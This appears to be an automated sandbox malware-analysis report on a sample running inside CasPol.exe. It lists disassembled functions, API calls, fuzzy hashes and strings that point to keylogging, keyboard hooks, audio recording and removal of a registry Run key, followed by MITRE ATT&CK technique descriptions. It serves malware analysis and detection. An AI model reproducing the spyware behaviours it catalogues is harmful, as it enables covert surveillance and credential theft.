Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9

Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00421016

Strings

4[G, xrefs: 00420FEC
4[G, xrefs: 004211E1

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _memcmp
String ID: 4[G$4[G
API String ID: 2931989736-4028565467
Opcode ID: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
Opcode Fuzzy Hash: c0cf07660e95b0ee548887709ac0c844436c6f626d7fb978308fdfb467b77264
Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD

Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00414BC0
GetTickCount.KERNEL32 ref: 00414C3C

Strings

>G, xrefs: 00414BEF

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: >G
API String ID: 180926312-1296849874
Opcode ID: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
Opcode Fuzzy Hash: f703b500cb05a13244301c0645b6086ff7a6bd2c3e191b326370292c0f426d94
Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E

Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69

Strings

, xrefs: 0044DBAE
vD, xrefs: 0044DB5B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Info
String ID: $vD
API String ID: 1807457897-3636070802
Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65

Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9

Strings

OCP, xrefs: 00450942
ACP, xrefs: 0045090C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358

Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E

Strings

KeepAlive | Enabled | Timeout: , xrefs: 004049E5

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
Opcode Fuzzy Hash: 55e8a268f478e9dd55dcba40bfbb0b748b5ff50574cd289cd160118e090ea358
Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F

Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

%02i:%02i:%02i:%03i , xrefs: 0041A6C5
| , xrefs: 0041A6E3

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
Opcode Fuzzy Hash: d3ffcd1d0ca88ff003ebf63de90cbb52a1477b8a5ce084a0fda1429b811f37a5
Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E

Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

CloseHandle.KERNEL32(?), ref: 0040A7CA
UnhookWindowsHookEx.USER32 ref: 0040A7DD

Strings

Online Keylogger Stopped, xrefs: 0040A777, 0040A77F, 0040A7A6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
Opcode Fuzzy Hash: 441e50180230ba2ba05f386e367c5a536ce2e77025d1c3492b7828fca42d8fe8
Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB

Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D

Strings

T=G, xrefs: 004016F6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: T=G
API String ID: 2315374483-379896819
Opcode ID: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
Opcode Fuzzy Hash: 8fbe103bd9222016c2b4e2bc3eb0eb996b4ad057f7b910ac6b5a0adda4e0e2aa
Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98

Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC

Strings

IsValidLocaleName, xrefs: 004477B1, 004477BB
z=D, xrefs: 004477E3, 004477D0

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$z=D
API String ID: 1901932003-2791046955
Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC

Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401D96

Strings

T=G, xrefs: 00401DDB
T=G, xrefs: 00401DB7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: T=G$T=G
API String ID: 3519838083-3732185208
Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D

Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040AD5B

Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

[AltL], xrefs: 0040AD9D
[AltR], xrefs: 0040AD91

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB

Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448835

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

Strings

`@, xrefs: 00448819
`@, xrefs: 00448818

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID: `@$`@
API String ID: 1353095263-20545824
Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40

Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040ADB5

Strings

[CtrlL], xrefs: 0040ADE3
[CtrlR], xrefs: 0040ADD2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB

Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658

Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF

Strings

pth_unenc, xrefs: 0040AF77

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98

Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Strings

pth_unenc, xrefs: 00411699

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C

Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
GetLastError.KERNEL32 ref: 0043FB12
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

